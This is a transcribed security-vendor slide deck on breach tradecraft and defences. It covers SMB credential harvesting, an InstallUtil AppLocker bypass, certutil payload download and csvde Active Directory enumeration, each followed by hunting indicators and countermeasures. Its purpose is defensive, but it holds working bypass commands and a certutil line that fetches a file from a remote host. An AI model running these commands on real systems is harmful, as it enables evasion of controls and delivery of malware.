AND STOPPING THE NEXT ONE

Similar documents
HACKING EXPOSED: MELTING DOWN MEMORY

GEORGE KURTZ CEO & CO-FOUNDER, CROWDSTRIKE THE STATE OF CYBER: HOW STEALTHIER ATTACKS ARE BLURRING THE LINES BETWEEN CYBERCRIME AND STATECRAFT

BUILT TO STOP BREACHES. Cloud-Delivered Endpoint Protection

10 KEY WAYS THE FINANCIAL SERVICES INDUSTRY CAN COMBAT CYBER THREATS

AUTHENTICATION. Do You Know Who You're Dealing With? How Authentication Affects Prevention, Detection, and Response

Users They Click things

Mind The Gap. Exploit Free Whitelisting Evasion Tactics. Casey

Streaming Prevention in Cb Defense. Stop malware and non-malware attacks that bypass machine-learning AV and traditional AV

CompTIA. PT0-001 EXAM CompTIA PenTest+ Certification Exam Product: Demo. m/

Protecting Against Modern Attacks. Protection Against Modern Attack Vectors

Qualys Indication of Compromise

FTA 2017 SEATTLE. Cybersecurity and the State Tax Threat Environment. Copyright FireEye, Inc. All rights reserved.

Mobile Field Worker Security Advocate Series: Customer Conversation Guide. Research by IDC, 2015

MODERN DESKTOP SECURITY

Remote social engineering techniques involving Microsoft Universal Naming Convention (UNC) function.

The SANS Institute Top 20 Critical Security Controls. Compliance Guide

WINDOWS 10 ENTERPRISE New Security Features

How Breaches Really Happen

Sobering statistics. The frequency and sophistication of cybersecurity attacks are getting worse.

Building a Threat-Based Cyber Team

Un SOC avanzato per una efficace risposta al cybercrime

WHITEPAPER ATTIVO NETWORKS THREATDEFEND PLATFORM AND THE MITRE ATT&CK MATRIX

Penetration Testing! The Nitty Gritty. Jeremy Conway Partner/CTO

SentinelOne Technical Brief

Incident Scale

Jordan Levesque - Keeping your Business Secure

Artificial Intelligence Drives the next Generation of Internet Security

Part 2: How to Detect Insider Threats

CLICK TO EDIT MASTER TITLE RECENT STYLE APT CAMPAIGN TARGETING ENERGY SECTOR ASSETS

Pieter Wigleven Windows Technical Specialist

BOLSTERING DETECTION ABILITIES KENT KNUDSEN JUNE 23, 2016

10 FOCUS AREAS FOR BREACH PREVENTION

CROWDSTRIKE FALCON FOR THE PUBLIC SECTOR

Tanium Endpoint Detection and Response. (ISC)² East Bay Chapter Training Day July 13, 2018

Behavioral Analytics A Closer Look

ADVANCED THREAT PREVENTION FOR ENDPOINT DEVICES 5 th GENERATION OF CYBER SECURITY

A YEAR OF PURPLE. By Ryan Shepherd

Operationalizing the Three Principles of Advanced Threat Detection

[MS20744]: Securing Windows Server 2016

PrecisionAccess Trusted Access Control

Building Resilience in a Digital Enterprise

KASPERSKY ENDPOINT SECURITY FOR BUSINESS

How-to Guide: Tenable.io for Microsoft Azure. Last Updated: November 16, 2018

SentinelOne Technical Brief

How-to Guide: Tenable Nessus for Microsoft Azure. Last Updated: April 03, 2018

VMware AirWatch Content Gateway for Windows. VMware Workspace ONE UEM 1811 Unified Access Gateway

Make Cloud the Most Secure Environment for Business. Seth Hammerman, Systems Engineer Mvision Cloud (formerly Skyhigh Networks)

May the (IBM) X-Force Be With You

Moving from Reactive to Proactive Security. Sami Laiho Adminize / Intility Senior Technical Fellow, MVP April 28 th New-York City

8 Must Have. Features for Risk-Based Vulnerability Management and More

Part 1: Anatomy of an Insider Threat Attack

Windows 8 Boot Camp 6439; 5 Days, Instructor-led

Why Should You Care About Control System Cybersecurity. Tim Conway ICS.SANS.ORG

68 Insider Threat Red Flags

The Rise and Fall of

Advanced Threat Defense Certification Testing Report. Symantec Corporation Symantec Advanced Threat Protection

EU GENERAL DATA PROTECTION: TIME TO ACT. Laurent Vanderschrick Channel Manager Belgium & Luxembourg Stefaan Van Hoornick Technical Manager BeNeLux

WHITEPAPER. Protecting Against Account Takeover Based Attacks

VULNERABILITIES IN 2017 CODE ANALYSIS WEB APPLICATION AUTOMATED

Course Outline. Course Outline :: 20744A::

Discover threats quickly, remediate immediately, and mitigate the impact of malware and breaches

Reduce the Breach Detection Gap to Minutes. What is Forensic State Analysis (FSA)?

VMware AirWatch Content Gateway Guide for Windows

PREVENT CREDENTIAL THEFT IN HEALTHCARE

Building a More Secure Cloud Architecture

Endpoint Protection : Last line of defense?

VMware AirWatch Content Gateway Guide for Windows

Technology Roadmap for Managed IT and Security. Michael Kirby II, Scott Yoshimura 04/12/2017

Data Security and Privacy : Compliance to Stewardship. Jignesh Patel Solution Consultant,Oracle

How WebSafe Can Protect Customers from Web-Based Attacks. Mark DiMinico Sr. Mgr., Systems Engineering Security

Securing Windows Server 2016

CYBER SECURITY FOR MEDICAL COLLEGES

Key Technologies for Security Operations. Copyright 2014 EMC Corporation. All rights reserved.

Securing Your Salesforce Org: The Human Factor. February 2016 User Group Meeting

CS 356 Operating System Security. Fall 2013

Technology Roadmap for Managed IT and Security. Michael Kirby II, Scott Yoshimura 05/24/2017

ATTIVO NETWORKS THREATDEFEND INTEGRATION WITH MCAFEE SOLUTIONS

GLOBALPROTECT. Key Usage Scenarios and Benefits. Remote Access VPN Provides secure access to internal and cloud-based business applications

Next Generation Endpoint Security Confused?

deep (i) the most advanced solution for managed security services

AKAMAI CLOUD SECURITY SOLUTIONS

Verizon Software Defined Perimeter (SDP).

VMware AirWatch Content Gateway Guide for Windows

Microsoft Exam

how dtex fights insider threats

Securing Windows Server 2016

MD-100: Modern Desktop Administrator Part 1

Premediation. The Art of Proactive Remediation. Matthew McWhirt, Senior Manager Manfred Erjak, Principal Consultant OCTOBER 1 4, 2018 WASHINGTON, D.C.

CloudSOC and Security.cloud for Microsoft Office 365

Microsoft Securing Windows Server 2016

Joe Stocker, CISSP, MCITP, VTSP Patriot Consulting

ICS Security Monitoring

MEMORY AND BEHAVIORAL PROTECTION ENDPOINT SECURITY NETWORK SECURITY I ENDPOINT SECURITY I DATA SECURITY

CYBER ATTACKS DON T DISCRIMINATE. Michael Purcell, Systems Engineer Manager

DATA SHEET RISK & CYBERSECURITY PRACTICE EMPOWERING CUSTOMERS TO TAKE COMMAND OF THEIR EVOLVING RISK & CYBERSECURITY POSTURE

MCAFEE INTEGRATED THREAT DEFENSE SOLUTION

20744: Securing Windows Server Sobre o curso. Microsoft. Nível: Avançado Duração: 35h

Assessing Your Incident Response Capabilities Do You Have What it Takes?

Avanan for G Suite. Technical Overview. Copyright 2017 Avanan. All rights reserved.

Protect Your Organization from Cyber Attacks

Transcription:

LEARNING FROM HIGH-PROFILE BREACHES AND STOPPING THE NEXT ONE DAN LARSON VP OF PRODUCT, CROWDSTRIKE

CROWD-SOURCED CLOUD-BASED CAPTURE ENRICH HUNT 150B Events/day 109 Adversaries tracked 25,000 Breaches prevented/year INDICATORS OF COMPROMISE INDICATORS OF ATTACK PROTECT 3.5 million IOA decisions/sec ARTIFICIAL INTELLIGENCE & MACHINE LEARNING

LATEST ADVERSARY TRADECRAFT

CATEGORY: CREDENTIAL THEFT DELIVERY: STRATEGIC WEB COMPROMISE USING SMB

TECHNICAL BREAKDOWN VARIATIONS OF REMOTE SOURCE Javascript + Dean Edwards Packer obfuscation Tiny image Hidden in JQuery related Javascript files

REAL WORLD EXAMPLES MASSIVE BERSERK BEAR CREDENTIAL HARVESTING CAMPAIGN TARGETED NUMEROUS SECTORS Chemical Sept 2017 Financial Sept 2017 Hospitality Sept 2017 Oil & Gas April 2017 Technology April 2017 Engineering April 2017 Education April 2017

REAL WORLD EXAMPLES Another variation used spear-phishing emails. Word Docs contain code that attempts to retrieve doc template from remote source over WebDAV

REAL WORLD EXAMPLES POST HARVESTING ACTIVITY Offline hash cracking Pass the hash tools Public facing services most vulnerable Webmail VPN Remote conferencing software

COUNTERMEASURES Implement Two-Factor Authentication (2FA) Restrict or monitor SMB connectivity to remote servers Robust password policies (length/duration/reuse) Restrict or monitor remote user authentication Leverage threat intel to track known SMB C2s

CATEGORY: WHITELISTING BYPASS DELIVERY: INSTALLUTIL

TECHNICAL BREAKDOWN InstallUtil CLI tool for install/uninstall of apps Part of.net framework MS signed binary inside the Windows directory handy for bypassing whitelists Discovered by @subtee, who also created C# code that can be used in combination to bypass Applocker restriction of PowerShell

TECHNICAL BREAKDOWN 1. Use InstallUtil-PowerShell.cs and System.Management.Automation.dll to compile a special PowerShell executable /w csc.exe csc.exe /reference: System.Management.Automation.dll /out:powershell.exe InstallUtil-PowerShell.cs 2. Execute PowerShell binary with InstallUtil InstallUtil.exe /logfile= /LogToConsole=false /U powershell.exe

REAL WORLD EXAMPLES Seen in Oct 2017, January 2018 InstallUtil.exe" /run= /logfile= /LogToConsole=false /u "C:\Windows\Microsoft.NET\Framework\v4.0. 30319\WPF\wpf-etw.dat Consistent with QuasarRAT public reporting https://www.pwc.co.uk/cybersecurity/pdf/cloud-hopper-annex-bfinal.pdf InstallUtil.exe" /LogFile= /LogToConsole=false /u C:\Windows\System32\CatRoot\{127D0A1D- 4EF2-11D1-8608-00C04FC295EE}\HECI.cat - inputformat xml -outputformat text Chinese Adversary

COUNTERMEASURES In many environments InstallUtil is rarely used Consider blocking its execution If needed, try to monitor its usage instead and compare arguments against historical usage Weak hunting indicator: FileName=installutil.exe AND CommandLine=*LogToConsole= false /u*

CATEGORY: DEPLOYMENT OF RECON TOOLS DELIVERY: CERTUTIL + EXPAND + CSVDE

TECHNICAL BREAKDOWN CERTUTIL CSVDE A built-in Windows command-line program that is installed as part of Certificate Services Windows Server command-line program that is installed as part of AD DS and AD LDS Tools feature Also has the ability to download remote file (-urlcache flag) and decode base64 files (-decode flag) Great for downloading malware! NOT included with Client OS Can be used to enumerate AD environment EXPAND A built-in Windows command-line program to decompress CAB files

TECHNICAL BREAKDOWN Using CSVDE to enumerate Active Directory to disk csvde.exe f out.csv Here is a subset of the data returned. I couldn t fit it all, over 370 fields!

REAL WORLD EXAMPLES Seen in Aug and Nov 2017 certutil.exe -decode KB[REDACTED].log KB[REDACTED].log expand KB[REDACTED].log csvde.exe Chinese Adversary Seen in Feb 2018 certutil.exe -urlcache -split -f http://xx.xx.xx.xx/news/n4.jpg C:\Users\[REDACTED]\AppData\Local\Temp\8\index.zip

COUNTERMEASURES Certutil is rarely used with the aforementioned command line args Consider blocking its execution If needed, try to monitor its usage instead and compare arguments against historical usage Weak hunting indicator: FileName=certutil.exe AND CommandLine=*-urlcache split f* Weak hunting indicator: FileName=certutil.exe AND CommandLine=*-decode* CSVDE is not found on client version of Windows, can be blocked or monitored for hunting indicator on non Server systems Weak hunting indicator: FileName=csvde.exe AND Type!=Server

SPEED IS EVERYTHING: THE 1-10-60 RULE

BREAKOUT TIME 1 HOUR 58 MINUTES Avg. time for an intruder to begin moving laterally to other systems in the network

SURVIVAL OF THE FASTEST: THE 1-10-60 RULE TIME TO DETECT 1 MIN TIME TO INVESTIGATE 10 MIN TIME TO REMEDIATE & CONTAIN 60 MIN

SURVIVAL OF THE FASTEST: THE 1-10-60 RULE TIME TO DETECT 1 MIN KEYS TO SUCCESS: ARTIFICIAL INTELLIGENCE & MACHINE LEARNING INDICATORS OF ATTACK CLOUD-NATIVE ARCHITECTURE

SURVIVAL OF THE FASTEST: THE 1-10-60 RULE TIME TO INVESTIGATE 10 MIN KEYS TO SUCCESS : ENDPOINT DETECTION & RESPONSE THREAT INTELLIGENCE HUNTING TEAM

SURVIVAL OF THE FASTEST: THE 1-10-60 RULE TIME TO REMEDIATE & CONTAIN 60 MIN KEYS TO SUCCESS : CLOUD-BASED REMOTE DEVICE MANAGEMENT PROACTIVE PLANNING & PREP GOOD BUSINESS PROCESSES & COMMUNICATION

THE POWER OF ONE

TRY IT FOR YOURSELF: crowdstrike.com/freetrial

2024 © technodocbox.com Privacy Policy | Terms of Service | Feedback